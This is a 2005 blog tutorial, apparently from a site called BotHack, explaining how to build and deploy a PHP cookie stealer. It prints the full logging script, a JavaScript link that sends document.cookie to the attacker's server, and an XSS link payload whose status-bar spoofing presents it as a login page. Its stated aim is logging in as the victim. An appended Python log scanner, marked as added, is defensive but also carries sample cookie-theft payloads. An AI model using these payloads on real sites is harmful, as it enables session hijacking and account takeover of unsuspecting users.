BotHack

BotHack makes getting things done easy and fun. Delving deep into the technoweb, BotHack brings back simple and totally life-altering tips and tricks for managing your information and time. At this wild moment in the development of human-oriented technology, BotHack is your own personal early adopter, here to guide you through the onslaught of the new. The world is full of fascinating problems waiting to be solved: BotHack can help.

Sunday, August 07, 2005

Tutorial: Cookie stealer

In this tutorial I will explain what a cookiestealer is, why it is useful to have one, and even more important, how to write it!

First of all, we'll need web hosting and an FTP program, like WS_FTP. (See below for links.) Before we start, be sure your hosting supports PHP.

What is it?
A cookiestealer is a small script, written in a web-based programming language (in this case PHP). It reads a variable from the address bar, which in our case contains the cookies we want to steal. Of course you can add some more information, like the referrer, the IP and the date and time of the log.

Why to use it?
As you might know, most of the time, login information is stored in cookies. So if you can make the browser think you're the one who logged in, and set the cookies, you'll be able to log in as the person you defaced. How we make the browser think this, I will post later on.

Writing the stealer.
I will give you the script and after that I will explain what it does line by line. So here it is:

1 < ? php //don't type stuff after this "//". and delete the two spaces between < ? php

2 $cookie = $_GET['c];

3 $ip = getenv ('REMOTE_ADDR');

4 $date=date("j F, Y, g:i a");;

5 $referer=getenv ('HTTP_REFERER');

6 $fp = fopen('cookies.txt', 'a');

7 fwrite($fp, 'Cookie: '.$cookie.'
IP: ' .$ip. '
Date and Time: ' .$date. '
Referer: '.$referer.'


'); 8 fclose($fp);

9 header ("Location: /picture.html");

10 ?>

That's all! Well, time to explain:

1: < ? php Opening tag for php... that's just all

2: $cookie = $_GET['C']; Here the variable $cookie gets its content out of the address, from what's behind C=[thecookie]

3: $ip = getenv ('REMOTE_ADDR'); That's the IP of the person who is redirected to our stealer.

4. $date=date("j F, Y, g:i a");; This sets the variable $date to the current time and date. IMPORTANT: this is done in the Dutch way, so year - month - day!

5. $referer=getenv ('HTTP_REFERER'); That must be the referer, don't you think =p

6. $fp = fopen('cookies.txt', 'a'); This specifies the file which has to be rewritten with the cookie, and 'a' stands for the way of writing, in this case adding the new content to the end of the file.

7. fwrite($fp, 'Cookie: '.$cookie.'n IP: ' .$ip. 'n Date and Time: ' .$date. 'n Referer: '.$referer.'nnn'); This line writes the content to the file.

8. fclose($fp); Close the file (dûh)

9. header ("Location: /picture.html");
Sends the visitor to another page, so he won't notice that the cookie is logged... of course picture.html can be anything.

10. ?> The closing tag for a php-script

Now we have to know how to make the link:
This must be the most basic version:

w indow .l ocation('http://www.mysite/c ookie.p hp?c=' + d ocument.c ookie)
//change the two "s cript"s above to "script" this is because blogger doesnt accept html commands like them in a post. delete the space between window and .location. delete the space between p and hp, between l and ocation, betwn d and ocument, between c and ookie, w and indow//

But when doing it hardcore, you can do it this way:
/*
< a
h ref=”http://www.example.com/index.php?page= ript>document.location.replace('http://www.mysite.com/log
.p hp?c=' +document.cookie);” onmouseover=”window.status='http://www.example.com
/login.php'; return true” onmouseout=”window.status=''; return true” >Login page< / a>//delete space between 'h' and 'ref', '/' and 'a', 's' and 'cript' , 'p' and 'hp'
*/
Be creative!
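
Seen from the defending side, the link above leaves a trace in the vulnerable site's own access log, because the script travels in the page= parameter. The Python below is an added example, not code from the original post: it decodes nested URL-encoding and flags parameters that read document.cookie together with a redirect. The log lines, the placeholder host collector.invalid and all function names are constructed for illustration.

```python
import re
from urllib.parse import parse_qsl, unquote_plus, urlsplit

# Constructed access-log lines (not real traffic); collector.invalid is a placeholder host.
SAMPLE_LOG = [
    '203.0.113.5 - - [07/Aug/2005:10:00:01 +0000] "GET /index.php?page=news HTTP/1.1" 200 512',
    '203.0.113.9 - - [07/Aug/2005:10:02:13 +0000] "GET /index.php?page=%3Cscript%3Edocument.location.replace(%27http://collector.invalid/log.php?c=%27%2Bdocument.cookie)%3B%3C/script%3E HTTP/1.1" 200 733',
    '203.0.113.9 - - [07/Aug/2005:10:02:40 +0000] "GET /index.php?page=%253Cscript%253Ewindow.location=%2527//collector.invalid/?c=%2527%252Bdocument.cookie%253C/script%253E HTTP/1.1" 200 733',
    '198.51.100.7 - - [07/Aug/2005:10:05:02 +0000] "GET /search.php?q=%3Cscript%3Ealert(document.cookie)%3C/script%3E HTTP/1.1" 200 410',
    '198.51.100.8 - - [07/Aug/2005:10:06:55 +0000] "GET /search.php?q=how+does+document.cookie+work HTTP/1.1" 200 398',
]

REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
COOKIE_READ = re.compile(r"document\s*\.\s*cookie", re.I)
NAVIGATION = re.compile(r"(?:document|window)\s*\.\s*location|location\s*\.\s*(?:replace|assign|href)", re.I)
MARKUP = re.compile(r"<\s*script|\bon\w+\s*=|javascript:", re.I)

def fully_decode(value, max_rounds=3):
    """Undo nested URL-encoding (bounded) so %253Cscript is seen as <script."""
    for _ in range(max_rounds):
        decoded = unquote_plus(value)
        if decoded == value:
            break
        value = decoded
    return value

def classify(value):
    """Return a verdict for one query-parameter value, or None if it looks benign."""
    text = fully_decode(value)
    if not COOKIE_READ.search(text):
        return None
    if NAVIGATION.search(text):
        return "cookie-exfil"  # cookie read combined with a redirect, as in the link above
    return "cookie-read" if MARKUP.search(text) else None

def scan(lines):
    """Return (line number, parameter name, verdict) for each suspicious parameter."""
    findings = []
    for number, line in enumerate(lines, 1):
        match = REQUEST_RE.search(line)
        if not match:
            continue
        for name, value in parse_qsl(urlsplit(match.group(1)).query, keep_blank_values=True):
            verdict = classify(value)
            if verdict:
                findings.append((number, name, verdict))
    return findings
if __name__ == "__main__":
    print(scan(SAMPLE_LOG))
```

Marking session cookies HttpOnly keeps them out of document.cookie altogether, which removes what the link depends on regardless of whether the request is spotted in the log.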

IMPORTANT:
Last but not least, don't forget to create a cookies.txt on your server and chmod it 666...

Links:

http://www.php.net // all about PHP
http://www.ipswitch.com // WS_FTP
http://www.google.com // Use it goddamnit!
http://www.bothack.blogspot.com // Just get back here.


Die Dulci Fruere
